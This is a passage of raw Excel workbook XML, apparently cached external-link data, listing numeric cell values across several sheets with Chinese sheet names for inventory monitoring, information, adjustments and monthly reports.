        </row>
        <row r="30">
          <cell r="V30">
            <v>243</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3049.90200000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>136.77</v>
          </cell>
        </row>
        <row r="67">
          <cell r="L67">
            <v>-2.91322521661641e-13</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>3.1e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000372</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24657534246575e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.16666666666667e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>281.910031</v>
          </cell>
          <cell r="S73">
            <v>6063.640372</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>37.8911331989247</v>
          </cell>
          <cell r="V73">
            <v>69.2196389497717</v>
          </cell>
          <cell r="W73">
            <v>231.197073700122</v>
          </cell>
          <cell r="X73">
            <v>211.912182720452</v>
          </cell>
          <cell r="Y73">
            <v>238.0265535972</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>3e-10</v>
          </cell>
          <cell r="S76">
            <v>3.6e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4.03225806451613e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10958904109589e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>248.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5308.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>33.3642473118293</v>
          </cell>
          <cell r="V77">
            <v>60.5941780821931</v>
          </cell>
          <cell r="W77">
            <v>21.89</v>
          </cell>
          <cell r="X77">
            <v>21.1</v>
          </cell>
          <cell r="Y77">
            <v>19.83</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>9.75</v>
          </cell>
          <cell r="R79">
            <v>373.695277777778</v>
          </cell>
          <cell r="S79">
            <v>4011.25416666667</v>
          </cell>
          <cell r="T79">
            <v>40.625</v>
          </cell>
          <cell r="U79">
            <v>50.227859916368</v>
          </cell>
          <cell r="V79">
            <v>45.7905726788432</v>
          </cell>
          <cell r="W79">
            <v>108.820512820513</v>
          </cell>
          <cell r="X79">
            <v>102.653156946799</v>
          </cell>
          <cell r="Y79">
            <v>102.296684017156</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>21.9163888888889</v>
          </cell>
          <cell r="R80">
            <v>300.33</v>
          </cell>
          <cell r="S80">
            <v>2905.18583333333</v>
          </cell>
          <cell r="T80">
            <v>91.318287037037</v>
          </cell>
          <cell r="U80">
            <v>40.366935483871</v>
          </cell>
          <cell r="V80">
            <v>33.1642218417047</v>
          </cell>
          <cell r="W80">
            <v>77.1568714432376</v>
          </cell>
          <cell r="X80">
            <v>83.4948223620684</v>
          </cell>
          <cell r="Y80">
            <v>79.579074545719</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>10.25</v>
          </cell>
          <cell r="R81">
            <v>261.380833333333</v>
          </cell>
          <cell r="S81">
            <v>3157.14416666667</v>
          </cell>
          <cell r="T81">
            <v>42.7083333333333</v>
          </cell>
          <cell r="U81">
            <v>35.131832437276</v>
          </cell>
          <cell r="V81">
            <v>36.0404585235921</v>
          </cell>
          <cell r="W81">
            <v>282.829268292683</v>
          </cell>
          <cell r="X81">
            <v>277.499306567365</v>
          </cell>
          <cell r="Y81">
            <v>275.831243056423</v>
          </cell>
        </row>
        <row r="92">
          <cell r="Y92">
            <v>4206.04</v>
          </cell>
        </row>
        <row r="93">
          <cell r="Y93">
            <v>24935.7550000508</v>
          </cell>
        </row>
        <row r="94">
          <cell r="Y94">
            <v>7000</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="32">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>2798.62500000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>36764.4730000508</v>
          </cell>
        </row>
        <row r="20">
          <cell r="F20">
            <v>3.1e-10</v>
          </cell>
          <cell r="G20">
            <v>3.41e-9</v>
          </cell>
        </row>
        <row r="21">
          <cell r="F21">
            <v>60840.1700000003</v>
          </cell>
          <cell r="G21">
            <v>1444407.42</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>36357.6689999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6094.11</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12264.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>12798.147</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1441.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3305.40100000001</v>
          </cell>
        </row>
        <row r="67">
          <cell r="L67">
            <v>-2.91322521661641e-13</v>
          </cell>
        </row>
        <row r="72">
          <cell r="R72">
            <v>3.1e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000372</v>
          </cell>
        </row>
        <row r="72">
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24657534246575e-6</v>
          </cell>
        </row>
        <row r="72">
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.16666666666667e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="R73">
            <v>281.910031</v>
          </cell>
          <cell r="S73">
            <v>6063.640372</v>
          </cell>
        </row>
        <row r="73">
          <cell r="U73">
            <v>37.8911331989247</v>
          </cell>
          <cell r="V73">
            <v>69.2196389497717</v>
          </cell>
        </row>
        <row r="73">
          <cell r="X73">
            <v>215.814136815871</v>
          </cell>
          <cell r="Y73">
            <v>238.207962772632</v>
          </cell>
        </row>
        <row r="76">
          <cell r="R76">
            <v>3e-10</v>
          </cell>
          <cell r="S76">
            <v>3.6e-9</v>
          </cell>
        </row>
        <row r="76">
          <cell r="U76">
            <v>4.03225806451613e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10958904109589e-11</v>
          </cell>
        </row>
        <row r="76">
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="R77">
            <v>248.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5308.05000000012</v>
          </cell>
        </row>
        <row r="77">
          <cell r="U77">
            <v>33.3642473118293</v>
          </cell>
          <cell r="V77">
            <v>60.5941780821931</v>
          </cell>
        </row>
        <row r="77">
          <cell r="X77">
            <v>21.08</v>
          </cell>
          <cell r="Y77">
            <v>19.82</v>
          </cell>
        </row>
        <row r="79">
          <cell r="R79">
            <v>373.695277777778</v>
          </cell>
          <cell r="S79">
            <v>4011.25416666667</v>
          </cell>
        </row>
        <row r="79">
          <cell r="U79">
            <v>50.227859916368</v>
          </cell>
          <cell r="V79">
            <v>45.7905726788432</v>
          </cell>
        </row>
        <row r="79">
          <cell r="X79">
            <v>102.653156946799</v>
          </cell>
          <cell r="Y79">
            <v>102.296684017156</v>
          </cell>
        </row>
        <row r="80">
          <cell r="R80">
            <v>300.33</v>
          </cell>
          <cell r="S80">
            <v>2905.18583333333</v>
          </cell>
        </row>
        <row r="80">
          <cell r="U80">
            <v>40.366935483871</v>
          </cell>
          <cell r="V80">
            <v>33.1642218417047</v>
          </cell>
        </row>
        <row r="80">
          <cell r="X80">
            <v>83.4948223620684</v>
          </cell>
          <cell r="Y80">
            <v>79.579074545719</v>
          </cell>
        </row>
        <row r="81">
          <cell r="R81">
            <v>261.380833333333</v>
          </cell>
          <cell r="S81">
            <v>3157.14416666667</v>
          </cell>
        </row>
        <row r="81">
          <cell r="U81">
            <v>35.131832437276</v>
          </cell>
          <cell r="V81">
            <v>36.0404585235921</v>
          </cell>
        </row>
        <row r="81">
          <cell r="X81">
            <v>279.412224181192</v>
          </cell>
          <cell r="Y81">
            <v>275.989614031457</v>
          </cell>
        </row>
        <row r="92">
          <cell r="Y92">
            <v>4206.04</v>
          </cell>
        </row>
        <row r="93">
          <cell r="Y93">
            <v>25058.433</v>
          </cell>
        </row>
        <row r="94">
          <cell r="Y94">
            <v>7500</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="33">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>-55.2988999999998</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>2798.62500000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>1100</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>477.321999999986</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>36764.4730000508</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>500</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>36357.6689999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6094.11</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12264.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>500</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>12798.147</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1441.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>-255.499000000001</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3305.40100000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>0</v>
          </cell>
          <cell r="R72">
            <v>3.1e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000372</v>
          </cell>
          <cell r="T72">
            <v>0</v>
          </cell>
          <cell r="U72">
            <v>6.95566325614791e-8</v>
          </cell>
          <cell r="V72">
            <v>7.07116788321168e-7</v>
          </cell>
          <cell r="W72">
            <v>0</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.16666666666667e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>0</v>
          </cell>
          <cell r="R73">
            <v>281.910031</v>
          </cell>
          <cell r="S73">
            <v>6063.640372</v>
          </cell>
          <cell r="T73">
            <v>0</v>
          </cell>
          <cell r="U73">
            <v>0.632539111021361</v>
          </cell>
          <cell r="V73">
            <v>11.5260803908151</v>
          </cell>
          <cell r="W73">
            <v>3.90195409541849</v>
          </cell>
          <cell r="X73">
            <v>215.814136815871</v>
          </cell>
          <cell r="Y73">
            <v>238.207962772632</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>0</v>
          </cell>
          <cell r="R76">
            <v>3e-10</v>
          </cell>
          <cell r="S76">
            <v>3.6e-9</v>
          </cell>
          <cell r="T76">
            <v>0</v>
          </cell>
          <cell r="U76">
            <v>6.73128702207862e-13</v>
          </cell>
          <cell r="V76">
            <v>6.84306569343066e-12</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="S77">
            <v>5059.82000000011</v>
          </cell>
          <cell r="T77">
            <v>0</v>
          </cell>
          <cell r="U77">
            <v>0</v>
          </cell>
          <cell r="V77">
            <v>9.61796684914863</v>
          </cell>
          <cell r="W77">
            <v>-0.0200000000000031</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>0</v>
          </cell>
          <cell r="R79">
            <v>363.945277777778</v>
          </cell>
          <cell r="S79">
            <v>4001.50416666667</v>
          </cell>
          <cell r="T79">
            <v>0</v>
          </cell>
          <cell r="U79">
            <v>0.816606708350785</v>
          </cell>
          <cell r="V79">
            <v>15.2125310472425</v>
          </cell>
          <cell r="W79">
            <v>0</v>
          </cell>
          <cell r="X79">
            <v>102.48793507571</v>
          </cell>
          <cell r="Y79">
            <v>102.280788161952</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>278.413611111111</v>
          </cell>
          <cell r="S80">
            <v>2883.26944444445</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>0.624693975747422</v>
          </cell>
          <cell r="V80">
            <v>5.4806672833874</v>
          </cell>
          <cell r="W80">
            <v>0</v>
          </cell>
          <cell r="X80">
            <v>83.9937383329559</v>
          </cell>
          <cell r="Y80">
            <v>79.5974862641465</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>251.130833333333</v>
          </cell>
          <cell r="S81">
            <v>3146.89416666667</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>0.563477906420152</v>
          </cell>
          <cell r="V81">
            <v>5.98177875354826</v>
          </cell>
          <cell r="W81">
            <v>1.91291761382655</v>
          </cell>
          <cell r="X81">
            <v>279.272756232641</v>
          </cell>
          <cell r="Y81">
            <v>275.967336048003</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="34"/>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库存监控"/>
      <sheetName val="信息表"/>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调整表"/>
      <sheetName val="月报"/>
      <sheetName val="Sheet2"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2704</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>37230.3399999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.75</v>
          </cell>
          <cell r="M6">
            <v>9.75</v>
          </cell>
          <cell r="N6">
            <v>4203.67</v>
          </cell>
          <cell r="O6">
            <v>40.625</v>
          </cell>
          <cell r="P6">
            <v>40.625</v>
          </cell>
          <cell r="Q6">
            <v>52.2844527363184</v>
          </cell>
          <cell r="R6">
            <v>85.3333333333333</v>
          </cell>
          <cell r="S6">
            <v>85.3333333333333</v>
          </cell>
          <cell r="T6">
            <v>86.1589991602576</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>9.75</v>
          </cell>
          <cell r="M7">
            <v>9.75</v>
          </cell>
          <cell r="N7">
            <v>4032.33</v>
          </cell>
          <cell r="O7">
            <v>40.625</v>
          </cell>
          <cell r="P7">
            <v>40.625</v>
          </cell>
          <cell r="Q7">
            <v>50.1533582089552</v>
          </cell>
          <cell r="R7">
            <v>192</v>
          </cell>
          <cell r="S7">
            <v>192</v>
          </cell>
          <cell r="T7">
            <v>187.582117535023</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>832</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>200</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>402</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>285</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2814.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>119</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4498.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>500</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2537.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>348</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4215.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>500</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>2034.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1872</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3242.83</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>43.34</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>69</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>91.887</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>278</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>353.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>2611.33</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>27631.35</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9598.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2463</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>35864.7099999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.75</v>
          </cell>
          <cell r="M6">
            <v>19.5</v>
          </cell>
          <cell r="N6">
            <v>4213.42</v>
          </cell>
          <cell r="O6">
            <v>40.625</v>
          </cell>
          <cell r="P6">
            <v>40.625</v>
          </cell>
          <cell r="Q6">
            <v>52.249751984127</v>
          </cell>
          <cell r="R6">
            <v>89.1282051282051</v>
          </cell>
          <cell r="S6">
            <v>87.2307692307692</v>
          </cell>
          <cell r="T6">
            <v>86.1658700058385</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>8</v>
          </cell>
          <cell r="M7">
            <v>17.75</v>
          </cell>
          <cell r="N7">
            <v>4040.33</v>
          </cell>
          <cell r="O7">
            <v>33.3333333333333</v>
          </cell>
          <cell r="P7">
            <v>36.9791666666667</v>
          </cell>
          <cell r="Q7">
            <v>50.1032986111111</v>
          </cell>
          <cell r="R7">
            <v>199.25</v>
          </cell>
          <cell r="S7">
            <v>195.267605633803</v>
          </cell>
          <cell r="T7">
            <v>187.605220365663</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>869</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>402</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>237</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2577.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>670</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>400</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4768.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>1139</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>500</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3176.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>469</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>574</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4110.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>200</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1834.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1594</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3828.63</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.49</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>63</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>73.377</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
